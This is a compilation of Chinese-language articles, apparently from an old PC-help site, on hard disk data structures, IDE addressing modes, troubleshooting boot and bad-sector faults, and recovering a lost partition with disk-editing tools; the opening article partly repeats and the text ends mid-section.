    在头盘组件的腔体内，是硬盘的磁盘片，磁盘片的数据结构，依磁道从低到高，由下列五部分组成：
    (1)MBR：主引导区记录（Master Boot Record）
    MBR位于硬盘的柱面0、磁头0、扇区1的位置，也即俗称的零磁道位置。它是由分区命令Fdisk产生的。MBR结束标志为55AA。用杀毒软件KV300＋的F6功能即可查看，其默认画面即为MBR。
    (2)DBR：DOS启动记录(DOS Boot Record)
    DBR位于硬盘的柱面0、磁头1、扇区1的位置。它是由格式化命令Format产生的。DBR结束标志为55AA。在KV300＋的F6功能下，按F1，所显示的画面即为DBR信息。
    (3)FAT：文件分配表(File Allocation Table)
    FAT表位于柱面0、磁头1、扇区2的位置。FAT表的大小由硬盘容量决定，硬盘容量愈大，FAT表相应愈大。
    (4)DIR区：根目录区（Directory）
    DIR区是根目录区的意思。当我们在DOS提示符下键入DIR并按回车键ENTER，显示器上所显示的内容即为该区内容。
    (5)DATA区：数据区
    DATA区负责硬盘中数据的存储。当将数据复制到硬盘时，数据就存放在DATA区。

目前，增强型IDE（EIDE）硬盘的工作模式分为三种：NORMAL、LBA和LARGE模式。
    NORMAL模式即普通模式。这是原有IDE方式。在此方式下对硬盘访问时，BIOS和IDE控制器对参数不作任何转换。此模式下支持的最大柱面数为1024，最大磁头数为16，最大扇区数为63，每扇区字节数为512。因此支持最大硬盘容量为：512×63×16×1024=528MB
    LBA(Logical Block Addressing)模式即逻辑块地址模式。在LBA模式下，设置的柱面、磁头、扇区等参数并不是实际的物理参数。在访问硬盘时，由IDE控制器把由柱面、磁头、扇区等参数确定的逻辑地址转换为实际硬盘的物理地址。在LBA模式下，可设置的最大磁头数为255，其余参数与普通模式相同。由此可计算出可访问的硬盘容量为：512×63×255×1024=8．4G

    LARGE模式即大模式。当硬盘的柱面超过1024而又不为LBA支持时，可采用此种模式。LARGE模式采用的方法为把柱面数除以2，把磁头数乘以2，即使柱面数减少，但总容量不变。相反的转换过程由BIOS的INT 13H完成，以便取得正确的硬盘地址。LARGE模式支持最大硬盘容量为：512×63×32×512=1GB
    现在的高容量硬盘都是设置成LBA，其他两种已经很少用了。
硬盘的启动过程一般是按照西面的步骤：
    第一步　BIOS测试硬盘。
    第二步　加载硬盘启动程序，确认硬盘分配表。
    第三步　加载DOS启动程序，确认BIOS参数区。
    第四步　加载IO．SYS、MSDOS．SYS启动文件。
    第五步　加载CONFIG．SYS文件。
    第六步　加载COMMAND．COM系统文件。
    第七步　加载AUTOEXEC．BAT批处理文件。
解决硬盘故障，一般用到的工具是一张软盘、Win98或者Win95（OSR2）启动盘、低级格式化软件、杀毒盘。
    硬盘故障大致可分为硬故障和软故障两大类
    硬故障通常指的就是PCBA板损坏、盘片划伤、磁头或是电机损坏等。由于硬故障维修要求的基本知识及要求条件较高，所以对于一般的用户来说是不能维修的,也做不到。

    软故障即硬盘片数据结构由于某种原因，如病毒导致硬盘数据结构混乱甚至不可被识别而形成的故障。一般来说，主板的BIOS硬盘自动检测（IDE HDD AUTO DETECTION）如果能够检测到硬盘时，说明硬盘没有物理损伤，如有问题应该为软故障。
    硬盘出现了软故障，我们一般可按如下步骤排除：
    第一步　检查主板BIOS中硬盘工作模式，看是否正确设置硬盘。
    第二步　用相应操作系统的启动盘启动计算机。
    第三步　检查硬盘标记55AA是否正常；活动分区标志80是否正常。
    第四步　用杀毒盘杀病毒。
    第五步　如果硬盘无法启动，可用启动盘启动，然后输入命令：SYS　C：回车。
    第六步　运行Scandisk命令以检查并修复FAT表或DIR区的错误。
    第七步　如果软件运行出错，可重新安装操作系统及应用程序。
    第八步　如果软件运行依旧出错，可对硬盘重新分区、高级格式化，并重新安装操作系统及应用程序。如果还没有效果的话，那么我们只能对硬盘进行低级格式化了，其实一款硬盘如果到了这个地步，基本上也就不可救药了，就算是低格成功，也会对硬盘造成不良影响。
    通常情况下，只要在开机的时候BIOS能够检测到硬盘参数，就有很大的希望可以修复。


硬盘软故障排除基本知识及实例

《一键清理系统垃圾》

硬盘软故障排除基本知识及实例

硬盘，是计算机中主要的硬件设备，是人们存储大量数据信息的外存之一。而同时，它又是计算机中比较容易出现故障的设备。当出现硬盘故障时，如何使硬盘能够起死回生呢？本文根据笔者的一点心得体会，谈谈硬盘软故障排除的一些基本知识及故障排除实例。
    在排除硬盘故障之前，首先让我们认识一下硬盘。
    基本知识
    一、硬盘的构成
    硬盘由两部分构成：
    1.磁头－盘片组件（Head Disk Assembly），简称头盘组件（HDA）；
    2.印刷电路板组件（Printed Circuit Board Assembly），简称PCBA。
    在HDA的腔体内，是硬盘的磁盘片，磁盘片的数据结构，依磁道从低到高，由下列五部分组成：
    （1）MBR：主引导区记录（Master Boot Record）
    MBR位于硬盘的柱面0、磁头0、扇区1的位置，也即俗称的零磁道位置。它是由分区命令Fdisk产生的。MBR结束标志为55AA。用杀毒软件KV300＋的F6功能即可查看，其默认画面即为MBR。
    （2）DBR：DOS启动记录（DOS Boot Record）
    DBR位于硬盘的柱面0、磁头1、扇区1的位置。它是由格式化命令Format产生的。DBR结束标志为55AA。在KV300＋的F6功能下，按F1，所显示的画面即为DBR信息。
    （3）FAT：文件分配表（File Allocation Table）
    FAT表位于柱面0、磁头1、扇区2的位置。FAT表的大小由硬盘容量决定，硬盘容量愈大，FAT表相应愈大。
    （4）DIR区：根目录区（Directory）
    DIR区是根目录区的意思。当我们在DOS提示符下键入DIR并按回车键ENTER，显示器上所显示的内容即为该区内容。
    （5）DATA区：数据区
    DATA区负责硬盘中数据的存储。当将数据复制到硬盘时，数据就存放在DATA区。
    二、硬盘的工作模式
    目前，增强型IDE（EIDE）硬盘的工作模式分为三种：NORMAL、LBA和LARGE模式。
    NORMAL模式即普通模式。这是原有IDE方式。在此方式下对硬盘访问时，BIOS和IDE控制器对参数不作任何转换。此模式下支持的最大柱面数为1024，最大磁头数为16，最大扇区数为63，每扇区字节数为512。因此支持最大硬盘容量为：512×63×16×1024=528MB
    LBA（Logical Block Addressing）模式即逻辑块地址模式。在LBA模式下，设置的柱面、磁头、扇区等参数并不是实际的物理参数。在访问硬盘时，由IDE控制器把由柱面、磁头、扇区等参数确定的逻辑地址转换为实际硬盘的物理地址。在LBA模式下，可设置的最大磁头数为255，其余参数与普通模式相同。由此可计算出可访问的硬盘容量为：512×63×255×1024=8.4G
    LARGE模式即大模式。当硬盘的柱面超过1024而又不为LBA支持时，可采用此种模式。LARGE模式采用的方法为把柱面数除以2，把磁头数乘以2，即使柱面数减少，但总容量不变。相反的转换过程由BIOS的INT 13H完成，以便取得正确的硬盘地址。LARGE模式支持最大硬盘容量为：512×63×32×512=1GB
    现在的高容量硬盘都是设置成LBA，其他两种已经很少用了。
    三、硬盘的启动
    硬盘的启动过程如下：
    第一步　BIOS测试硬盘。
    第二步　加载硬盘启动程序，确认硬盘分配表。
    第三步　加载DOS启动程序，确认BIOS参数区。
    第四步　加载IO.SYS、MSDOS.SYS启动文件。
    第五步　加载CONFIG.SYS文件。
    第六步　加载COMMAND.COM系统文件。
    第七步　加载AUTOEXEC.BAT批处理文件。
    排除实例
    要排除硬盘故障，当然要有适当的工具。以下是笔者常用的工具，仅供各位朋友参考。
    软盘一张（1.44MB、3.5英寸）、DOS6.22系统盘、Win98启动盘、Win95（OSR2）启动盘、MAXTOR的Lformat.exe低级格式化软件、KV300＋杀毒盘。
    硬盘故障大致可分为硬故障和软故障两大类
    硬故障即PCBA板损坏、盘片划伤、磁头音圈电机损坏等。由于硬故障维修要求的基本知识及维修条件较高，本文在此不作介绍。
    软故障即硬盘片数据结构由于某种原因，比如说病毒导致硬盘数据结构混乱甚至不可被识别而形成的故障。一般来说，主板BIOS硬盘自动检测（IDE HDD AUTO DETECTION）功能能够检测到硬盘参数时，均为软故障。
    硬盘软故障可按如下步骤排除：
    第一步　检查主板BIOS中硬盘工作模式，看是否正确设置硬盘。
    第二步　用相应操作系统的启动盘启动计算机。
    第三步　检查硬盘标记55AA是否正常；活动分区标志80是否正常。以国产著名杀毒软件KV300＋为例，可用其F6功能查看，用F10功能自动修复。或用Fdisk／MBR格式重建分区表。
    第四步　用杀毒盘（如KV300＋）查、杀病毒。注意：如用KV300＋查、杀病毒，应先用KV300／K格式清杀引导区病毒，再用KV300格式清杀病毒。
    第五步　如果硬盘无法启动，可用系统盘传送系统。命令格式为：SYS　C:回车。
    第六步　运行Scandisk命令以检查并修复FAT表或DIR区的错误。
    第七步　如果软件运行出错，可重新安装操作系统及应用程序。
    第八步　如果软件运行依旧出错，可对硬盘重新分区、高级格式化，并重新安装操作系统及应用程序。必要时可对硬盘低级格式化。
    下面介绍一下MAXTOR的低级格式化程序Lformat.exe的用法：
    在软盘上运行低级格式化程序，其命令格式为：
    Lformat　回车
    进入低级格式化程序主界面。主界面三个选项如下：
    SELECT DEVICE
    LOW LEVEL CURRENT DEVICE
    EXIT
    第一项为选择驱动器。编号为0、1、2、3，分别代表主板所能挂接的四个硬盘。当只有一个硬盘时，选0即可。第二项为低级格式化。当选中该项时，程序会提示是否按LBA模式低格，此时，可按具体情况选Y或N。大多数情况下选Y即可。之后，会提示硬盘上数据会全部丢失，问是否继续，此时键入Y即开始低级格式化硬盘。完成后，选第三项退出。
    下面介绍一些本人在工作中积累的一些软故障排除实例，供大家参考。
    例一、故障现象
    富士通1.2GB硬盘，硬盘参数可检测到，但启动时系统提示HD硬盘错。
    分析及解决：
    用软盘启动系统，用KV300＋清杀病毒，系统提示无硬盘。怀疑硬盘标记55AA被破坏，用KV300＋的F10功能自动修复。硬盘工作正常。
    例二、故障现象
    富士通1.2GB硬盘，硬盘参数可检测到，但启动后用DIR显示仅540MB。
    分析及解决：
    开机，进入BIOS设置画面。自动检测硬盘，为LBA模式下1.2GB硬盘，参数正常。用Fdisk重新分区、高级格式化，依然只有540MB容量。后用户称曾用一块486主板低级格式化该硬盘。考虑该486主板可能仅支持540MB硬盘，故在低级格式化该硬盘时，把1.2GB硬盘强制成540MB硬盘。用低级格式化程序Lformat低级格式化，重新分区、高级格式化，硬盘容量恢复为1.2GB。
    例三、故障现象
    昆腾2.1GB硬盘，硬盘参数可检测，Win97系统，启动时只有一个光标。
    分析及解决：
    考虑主板BIOS能够检测到硬盘参数，按软故障步骤处理，当用KV300＋杀毒盘杀毒时，发现TPVO／3783病毒，并成功杀死该病毒。重新启动机器，系统恢复正常。
    例四、故障现象
    希捷3.2GB硬盘，硬盘参数可检测，Win97系统，启动时只有一个光标。
    分析及解决：
    用杀毒盘杀毒，无病毒。考虑操作系统为Win97，用Dir／A格式查看隐含文件，发现有JO.SYS文件。我们知道：当在Win97启动时，按F8键并选择原有DOS模式时，可在硬盘根目录下产生JO.SYS文件。但不幸的是，Win97并不支持双引导。当进入原有DOS模式后，一旦再次启动，就无法正常引导Win97。找到故障点后，用Win97启动盘启动计算机，重新传送系统，机器恢复正常。
    例五、故障现象
    昆腾2.1GB硬盘，硬盘参数可检测，但启动时，系统提示：Missing Operating system。
    分析及解决：
    该系统提示意为：DOS被破坏。其错误原因为DOS引导记录坏或读写电路坏。考虑该计算机操作系统为UNIX，故进主板BIOS设置，发现硬盘工作模式为LBA方式。而UNIX操作系统要求硬盘工作模式为NORMAL方式。重设硬盘工作模式，系统正常。
    同时，我将列出硬盘启动出错信息、含义及原因一览^39030401a^表，以方便读者查阅。
    一般情况下，只要主板能够检测到硬盘参数，就有很大希望修复硬盘。当然，任何硬件的严重损坏，如PCBA板损坏或磁盘介质严重划伤，均不是可用软件来修复的。前文提到的分区命令Fdisk及高级格式化命令Format的用法，请参阅有关书籍。KV300＋杀毒盘的用法，请参阅KV300＋的用户手册。


硬盘数据恢复经验

《一键清理系统垃圾》

硬盘数据恢复经验

  硬盘作为用户存储数据的主要场所，其最大的用途莫过于存储数据，但有时往往由于用户操作不当，造成用户数据的丢失。如果对于普通用户，数据对用户相对而言并不重要，那么丢了就丢了，没有太大关系；但如果数据对用户很重要（对于这类用户，应经常备份数据），这时数据丢失了怎么办呢？此文就是通过一次对硬盘数据的恢复过程来简要说明一下硬盘数据恢复的方法，希望能对大家恢复硬盘数据有一定的帮助。
    相关概念
    MBR（Main Boot Record）即主引导记录区，它位于整个硬盘的0磁道0柱面1扇区，包括硬盘引导程序和分区表。
    DBR（Dos Boot Record）即操作系统引导记录区，通常位于硬盘的0磁道1柱面1扇区，是操作系统可直接访问的第一个扇区，它也包括一个引导程序和一个被称为BPB（BIOS Parameter Block）的本分区参数记录表。每个逻辑分区都有一个DBR。
    FAT（File Allocation Table）即文件分配表，是DOS、Windows9X系统的文件寻址格式，为了数据安全起见，FAT一般做成两个，第二FAT为第一FAT的备份。
    DIR是Directory即根目录区的简写，DIR紧接在第二FAT表之后。有关硬盘存储结构的详细介绍，可参考我在《电脑报》1999年第20期的文章《硬盘数据结构一瞥》。
    估计数据丢失原因：
    1.安装多系统引导软件后，异常操作造成。
    2.遭到某种病毒感染。数据丢失前状态：2.5GB硬盘，原分区为：C：2GB＋D：500MB，D盘装有重要数据。两分区均为FAT16格式。
    数据丢失过程
    一次系统重启后，D盘丢失。
    数据丢失后的操作
    该客户曾用Fdisk重新分区，试图按原分区大小再造分区，未果。但没有格式化D盘，只格式化了C盘并重装系统。
    客户的数据修复要求
    恢复D盘根目录下“数码相机”目录内所有文件。
    所用工具：
    NORTON DISK DOCTOR：diskedit.exe
    数据修复过程：
    一、数据备份　主要包括物理0磁道各扇区，各分区逻辑0磁道，FAT表和根目录区等，再配以GHOST备份各分区的数据区。
    二、分析该硬盘的主引导扇区MBR（包括主分区表和引导程序）、各分区的引导扇区DBR、FAT表及根目录区。
    由于已经重新分区并能顺利启动C盘（抛开病毒原因），故MBR的逻辑结构应该没问题，通过Diskedit命令察看MBR所在的0磁道第一扇区，证实估计正确，但现分区表与原分区表是否完全一致，还不能确定。
    通过分区表，可以查找到各分区的引导扇区所在的物理位置，分析后可确定C盘的各项重要数据（引导扇区、第一FAT表、第二FAT表、根目录区）均没有异常，但D盘除了引导扇区DBR外、上述的其他数据均无法对应，DBR之所以无异常，是因为重新分区的结果，而FAT1、FAT2和根目录区面目全非的原因，大致应该有两种可能：一是现分区与原分区不一致，导致数据对不上号；二是数据已被病毒破坏。
    由于在察看MBR时，发现0磁道的其他扇区留有不明程序的残余代码，通过察看其中的一些显示信息，可以判定是某种多系统软件留下的，说明客户曾经安装过多系统管理软件。这样大致可以排除病毒破坏分区的可能，分区丢失应该是异常操作多系统管理软件引起的。
    三、寻找原有分区　根据前面的分析，由于客户在数据丢失后又进行了重新分区，而且估计现有的分区与原来的分区不一致，这样无疑加大了数据修复的难度，但幸好没有格式化D盘，因为如果单单只是Fdisk，只会改写原硬盘的各分区的第一扇区。如果这个扇区不落在原分区的重要参数区（DBR、FAT、根目录）上，那么修复的成功率还是挺高的。接下来就是寻找原有D盘的重要数据区了。根据客户提供的资料可知，原D盘根目录下有一个叫“数码相机”的子目录，于是用DISKEDIT提供的搜索功能，搜索“数码相机”对应的十六进制代码，可以找到原有D盘的根目录区。历时30分钟，通过过滤搜索结果，最终找到该根目录所在的扇区，然后顺藤摸瓜，向前翻过两个FAT表（根据经验大概400个扇区～500个扇区）找到原D盘DBR所在的扇区，接着再向前翻63个扇区，找到原D盘的分区表，至此，最困难的问题攻克了。
    四、重建主分区表　因为客户后来用Fdisk重新建立的主分区表与原来的分区表并不一致，故必须手工重建原分区表，通过前面找到的原D盘分区表和原D盘的DBR，可以计算出主分区表，包括各分区的起始、结束扇区、分区大小、分区类型等。算出结果后，改写0磁道1扇区的主分区表。
    五、重启系统，出现原D盘，所有文件基本全部恢复。拷贝出“数码相机”目录，做好备份。通知客户取回数据。
    说明：
    1.数据备份时，不要过分相信GHOST，GHOST只认正确的分区，对于隐藏的分区它不会复制。对于不正确的分区，它会报告错误并停止复制过程。GHOST并非一个纯粹意义上的全盘复制软件，它只复制那些FAT表上存在的文件，并非复制磁盘上所有的数据！
    2.走运的是，该客户重新分的D盘刚好比原D盘大几个磁道，故新的D盘分区表被建在原C盘最后端的数据区中。所以本次维修基本上可以说100％地恢复了原D盘的数据。
    3.更走运的是，该客户没有重新格式化D盘，不然就不可能有那么高的恢复率了。
    给读者的建议
    在硬盘数据出现丢失后，请立即联系当地的数据修复公司。最好不要再对硬盘进行写操作，那样会增大修复的难度，也影响到修复的成功率。


硬盘维护全攻略

《一键清理系统垃圾》

硬盘维护全攻略

前段时候的IBM硬盘事件，可能许多受害者还记忆犹新、心有余悸吧。硬盘，也一度成为电脑中最脆弱、最娇贵的配件了，PCPOP上公布的三段IBM硬盘损坏的工作声音使我们毛骨悚然。由于硬盘存有用户的重要资料，所以，每个人都会尽自己所能地挽救硬盘。在BBS中，我们也常会看到许多人向大虾求救，询问维修的方法。而很多人却不负责任，很粗略地说了一下。完全不能解决用户的难题。针对这个迫在眉睫的问题，我们故将目前所常见的硬盘故障和其解决方法罗列以下，旨在将用户的损失降到最低。

‖硬盘常坏在哪里？‖

    首先我们要搞清楚，硬盘常坏在哪里，是怎么坏的，这样才能对症下药，达到事半功倍的效果。

1、逻辑坏道：俗称“软坏道”。是由软件安装或使用错误造成的，一般对硬盘本身不会造成太大的危害。

2、物理坏道：这类坏道就是前段IBM硬盘事件的普遍症状。磁头和磁盘间的间隙仅有0.015~0.025 μm ，这么小的间隙，硬盘在运输途中，如果受到强烈颠簸，会使硬盘产生物理坏道。除此以外，人为的错误也会使一块硬盘报废。一些粗心大意的人在装机时，硬盘螺丝没有拧紧，为日后的使用埋下了隐患。硬盘工作时的震动也会造成物理坏道的产生。

3、零磁道故障：众所周知，硬盘读盘都是从0磁道开始的。如果0磁道损坏，就会造成硬盘不能读盘、开机不能找到硬盘等等。

    以上三种算是硬盘常见的疑难症状。逻辑坏道算是硬盘故障中的伤寒而已，一般很容易解决，用Windows的磁盘扫描程序就能解决。如果无法“扫到病除”，大不了FORMAT硬盘、重装系统，也可以摆平。但对于物理坏道和零磁道故障，我们就得花费点时间和精力了。

症状一：在你打开某一文件或运行某一程序时，硬盘反复读盘且出错，或者要经过九牛二虎之力才能成功。与此同时，硬盘会发出异样的杂音；启动时不能通过硬盘引导系统，用软盘启动后可以转到硬盘盘符，但无法进入，用SYS命令传导系统也不能成功；FORMAT硬盘时，到某一进度停止不前，最后报错，无法完成；对硬盘执行FDISK时，到某一进度会反复进进退退。

    这些症状都是物理坏道的常见病症。目前尚无完全修复物理坏道的良药。只能通过修复少量的坏道或屏蔽坏道来缓解这一问题。

1、首先从最简单的方法入手。如果能进入Win9X系统，则使用Win9X自带的磁盘扫描程序，“扫描类型”选择“完全”，对所在分区进行一次完整的“体检”，发现并尽量修复潜在的坏簇。对于以上不能通过硬盘引导，即不能进入Win9X的现象，则可以用Win9X的启动盘启动系统，然后在A：>提示符后键入SCANDISK D：（其中“D”是具体的硬盘盘符）来扫描硬盘。对于坏簇，程序会以黑底红字的“B”（bad）标出。

2、由于Win9X只能修复逻辑坏道，对付物理坏道就有些心有余而力不足了。所以第一步往往不会奏效，但在所有的修复工作中，它却是最重要的。我们可以病症发生在哪个部位。在这些坏道上作好标记，对它疏而远之，惹不起，总躲得起吧。切记第一步中坏道的位置，然后对硬盘Format，将有坏道的区域单独划成一个区，如果坏道不是连续的，而且相距较远，可以将邻近的坏道划在一个区内，甚至可以多划几个区。值得注意的是，不要为吝啬硬盘空间而把含有坏道的区划得过分紧凑，坏道周围应留有适当的“好道”空间作为缓冲。以后就不要在这些危险区域内存取文件了，因为坏道具有扩散性，如果动用与坏道靠得过分近的“好道”，那么过不了多久，病情又会扩散了！

3、有些用户可能在硬盘中存储了大量的重要信息，如果亲手把这些价值连城的信息摧毁掉，那岂不是心如刀割？除了Format外，我们是否还有鱼和熊掌兼得的方法？答案是肯定的。我们可以尝试使用PartitionMagic对硬盘进行处理。PartitionMagic允许在不破坏数据的前提下对硬盘重新分区、动态改变分区大小、改变分区的文件格式、隐藏或显示已有分区等等。将PartitionMagic的DOS版拷在软盘上，用WIN9X启动盘引导系统，运行软盘上的PQMAGIC.EXE。由于PartitionMagic中Operations菜单下的“check”命令也能扫描硬盘，检查坏道，所以我们大可以化烦为简，跳过前两步。检查完毕，标记了坏簇后，在Operations菜单下选择“Advanced/bad Sector Retest”；把坏簇分成一个（或几个）区后，再通过Hide Partition菜单项把含有坏道的分区隐藏，以免在Windows9X中误操作。要特别注意的是，如果没有经过格式化而直接将有坏道的分区隐藏的话，那么该分区的后续分区将由于驱动器盘符的变化而导致其中的一些与盘符有关的程序无法正确运行。解决的办法是利用Tools菜单下的DriveMapper菜单项，它会自动地收集快捷方式和注册表内的相关信息，立即更新应用程序中的驱动器盘符参数，以确保程序的正常运行。这种方法适用于全系列的PartitionMagic，不过，需要提醒大家的是：强烈建议不要使用3.0以下的版本（可能你也找不到这版本了），因为3.0以下的PartitionMagic还很不成熟，会造成执行操作失败、甚至硬盘资料丢失的情况。对于想保留自己信息的用户，可要关注一下啊。

症状二：当你开机时，检测CPU、内存正常后，硬盘不能通过自检，屏幕显示“HDD Controller Error（硬盘控制器故障）”，而后死机。进入BIOS中仍然无法对硬盘进行设置，也找不到硬盘。用Norton、KV3000等软件也无法找到硬盘。

    碰到这种问题，就非常棘手了。这极大可能是零磁道损坏。但也不是无药可救。我们可以通过以下方法：

1、接上一个正常的硬盘，跳线设为Master。

2、刚才那个硬盘，跳线也设为Master，但只接电源线，不接数据线。

3、开机，运行Norton2000等的DiskEdit（磁盘编辑）。

4、在Tools（工具）菜单中点取Configuration（配置），将Read Olny（只读）复选框中的只读属性取消。

5、在Object（目标）菜单中点取Drive（驱动器），然后点取C:Hard Disk（C盘），并将Type（类型）设置成Physical Disks（物理磁盘）。

6、在Object（目标）中点取Partition Table（分区表）项，将完好硬盘的主引导记录（MBP）和分区表信息读取到内存中。

7、将正常硬盘上的信号线拔下并接到零磁道故障硬盘上。

8、从Tools（工具）菜单中点取Write Object To（目标写入至），选择To Physical Sectors（至物理扇区）后点取OK项，然后选择Hard Disk1后点击OK；从Write Object to Physical Sectors（目标写入至物理扇区）对话框中，将Cylinder（柱面）、Side（盘面）、Secto（扇区）分别设置成0、0、1后点取OK，当出现“警告”对话框时选择Yes项。

9、退出DiskEdit并重新启动计算机。

10、进入BIOS重新设置硬盘参数，并对硬盘重新分区。

症状三：开机时，硬盘引导失败，显示“Missing operation system”提示。

    这是DBR（DOS启动记录DOS Boot Record）损坏的症状，在此，我们需要重建DBR，方法可以利用系统盘上正常的DBR解决：

A> debug（把系统盘插入A驱）

-L100 0 0 1（把系统盘上正常的DBR装入内存）

-W100 2 0 1（用正常的DBR覆盖硬盘上的DBR）

-Q（退出）

注意保养，让你的硬件更长寿：

1、在电脑的配置上，如果内存容易较小，那硬盘读盘的次数就是显著增多，这对硬盘的寿命是没有保障的。

2、在装硬盘时，我们需要对硬盘进行加固，这是无可厚非的。但有的人的确粗心大意，固定硬盘的螺丝都没有拧紧，这对硬盘也是极其不利的。强烈的震动会使硬盘发出难以让人忍受的噪音，更严重的是，它是出现物理坏道的罪魁祸首。

3、大多数人总以为，电源是无关紧要的配件，其实不然。电源的好坏不但影响系统的稳定性，对硬盘也是非常重要的，如果电源的滤波非常差劲，会影响到硬盘的工作，使其出现非常多的怪问题。

4、频繁地对硬盘进行碎片整理，也是会导致硬盘老化的一大原因。


处理硬盘物理坏道方法

《一键清理系统垃圾》

处理硬盘物理坏道方法

    一、用软件来解决
    1.在天极网Ftp://ftp1.mydown.com/home1/soft34/fbdisk10.zip下载一个大小仅19.8KB的小软件FBDISK(坏盘分区器)。它可将有坏磁道的硬盘自动重新分区，将坏磁道设为隐藏分区。在DOS下运行FBDISK，屏幕提示Start scan hard disk?(Y/N),输入Y，开始扫描硬盘，并将坏道标出来，接着提示Write to disk?(Y/N)，选Y。坏道就会被隔离。(山东 马坤)

    2.用PartitionMagic对硬盘进行处理。先用PartitionMagic中的“Check”命令来扫描磁盘，大概找出坏簇所在的硬盘分区，然后在Operations菜单下选择“Advanced/bad Sector Retest”。再通过Hide Partition菜单把坏簇所在的分区隐藏起来，这样就可以避免对这个区域进行读写。如果系统提示“TRACK 0 BAD，DISK UNUSABLE”，那么说明硬盘的零磁道出现坏道。这需要通过Pctools9.0等磁盘软件，把0扇区0磁道屏蔽起来，最后用1扇区取代它就能修复。

    以Pctools9.0为例，运行Pctools9.0中的de.exe文件，接着选主菜单Select中的Drive，进去后在Drive type项选Physical，按空格选中它，再按Tab键切换到Drives项，选中hard disk，然后回到主菜单，打开Select菜单，在出现的Partition Table中，选中硬盘分区表信息。找到C盘，该分区是从硬盘的0柱面开始的，那么，将1分区的Beginning Cylinder的0改成1，保存后退出。重新启动后再重新分区、格式化即可。(吉林 解国忠)

    二、重新分区再隐藏
    用Windows系统自带的Fdisk。如果硬盘存在物理坏道，通过Scandisk和Norton Disk Doctor我们就可以估计出坏道大致所处位置，然后利用Fdisk分区时为这些坏道分别单独划出逻辑分区，所有分区步骤完成后再把含有坏道的逻辑分区删除掉，余下的就是没有坏道的好盘了。(上海 任亚维)

    三、低级格式化
    使用主板自带的硬盘低格程序或硬盘厂家随盘赠送的低格程序如DM、LFORMAT等对硬盘全盘进行低级格式化处理，它可对硬盘坏道重新整理并排除。不过不到山穷水尽，这一招最好不要用，因为对硬盘作低格害处多多，至少会加速对盘片的磨损。(


硬盘性能何故偏低？

《一键清理系统垃圾》

硬盘性能何故偏低？

《中国电脑教育报》熊义珍

    近日，老友终于“迎娶”回了自己心爱的电脑。为了检验这台电脑的性能，老友请我帮忙测试一下。本人慨然应允，并带上了自己常用的各种测试软件。

    经过一番测试，除了硬盘传输性能的测试成绩不尽如人意之外，其他得分倒也正常。在测试磁盘传输性能时，笔者使用的软件是SiSoftware Sandra 2002中文版，硬盘（迈拓星钻三代 ATA100）测试得分仅6500分（正常值应为21000分左右）。

    是什么原因导致硬盘测试得分仅为正常时的1/3呢？笔者认真检查了BIOS中的各项参数，均无误。接下来，笔者又打开机箱，对硬盘连接线仔细检查了一番。结果，均无任何问题。

    这台电脑的主板是微星815EPT，会不会是装机时，经销商没有正确安装主板附带光盘上的芯片组驱动程序呢？为了验证这个问题，笔者安装了光盘中的Intel Ultra ATA Storage Driver 6.10.006 beta Candidate 2。装完之后，重新启动电脑，再次运行测试软件，结果发现得分居然直线“飙升”到了24000分。

    由于商家在装机时的马虎，漏装了Ultra ATA Storage Driver，这个对于Intel 810、815、820、84x、850芯片组来说至关重要的驱动程序，硬盘不能工作在ATA/100传输模式之下，性能自然会有很大的损失。

    叮当点评：与VIA的4IN1驱动不同，Intel的芯片组驱动与磁盘驱动是分开的，需要分别安装，且有一定的顺序，即先芯片组驱动后磁盘驱动，这是让系统发挥出最佳性能的根本条件。


跳出硬盘认识的误区

《一键清理系统垃圾》

跳出硬盘认识的误区

    多年来一直误导着高朋的几个常识性问题是：

    1．硬盘逻辑坏道可以修复，而物理坏道不可修复。实际情况是，坏道并不分为逻辑坏道和物理坏道，不知道谁发明这两个概念，反正厂家提供的技术资料中都没有这样的概念，倒是分为按逻辑地址记录的坏扇区和按物理地址记录的坏扇区。

    2．硬盘出厂时没有坏道，用户发现坏道就意味着硬盘进入危险状态。实际情况是，每个硬盘出厂前都记录有一定数量的坏道，有些数量甚至达到数千上万个坏扇区，相比之下，用户发现一两个坏道算多大危险？

    3．硬盘不认盘就没救，0磁道坏可以用分区方法来解决。实际情况是，有相当部分不认的硬盘也可以修好，而0磁道坏时很难分区。

    如此误导，如不是自己搜集研究外文资料并长期实践，说不准还长期拿来作信条呢。 在国外有许多的专业的硬盘维修论坛，在那里你可以发现有一些国家的硬盘维修技术达到了很高水准。我敢肯定，他们的一些技术会令众多硬盘厂家头痛不已。和世界上众多专业硬盘修理高手交流，使高朋受益菲浅。 这三年来，高朋辞去教师工作，专门从事硬盘修复工作，经手修复的硬盘已超过万个。
总结起来，高朋的技术来源有三方面：

    1．搜集国外技术资料与国外专业人士交流；
    2．购买专业工具软件（有同步技术更新支持）；
    3．自己的实践经验。

    很遗憾，我没有找到教我修复硬盘的老师，也不认为哪本教科书对我修硬盘有太大帮助。

    硬盘修复人士需要弄明白的几个基本概念

    在研究硬盘修复和使用专业软件修复硬盘的过程中，必将涉及到一些基本的概念。在这里，高朋根据自己的研究和实践经验，试图总结并解释一些与“硬盘缺陷”相关的概念，与众位读者交流。

Bad sector (坏扇区)

    在硬盘中无法被正常访问或不能被正确读写的扇区都称为Bad sector。一个扇区能存储512Bytes的数据，如果在某个扇区中有任何一个字节不能被正确读写，则这个扇区为Bad sector。除了存储512Bytes外，每个扇区还有数十个Bytes信息，包括标识（ID）、校验值和其它信息。这些信息任何一个字节出错都会导致该扇区变“Bad”。例如，在低级格式化的过程中每个扇区都分配有一个编号，写在ID中。如果ID部分出错就会导致这个扇区无法被访问到，则这个扇区属于Bad sector。有一些Bad sector能够通过低级格式化重写这些信息来纠正。

    Bad cluster (坏簇)

    在用户对硬盘分区并进行高级格式化后，每个区都会建立文件分配表（File Allocation Table, FAT)。FAT中记录有该区内所有cluster（簇）的使用情况和相互的链接关系。如果在高级格式化（或工具软件的扫描）过程中发现某个cluster使用的扇区包括有坏扇区，则在FAT中记录该cluster为Bad cluster，并在以后存放文件时不再使用该cluster,以避免数据丢失。有时病毒或恶意软件也可能在FAT中将无坏扇区的正常cluster标记为Bad cluster, 导致正常cluster不能被使用。 这里需要强调的是，每个cluster包括若干个扇区，只要其中存在一个坏扇区，则整个cluster中的其余扇区都一起不再被使用.

    Defect (缺陷)

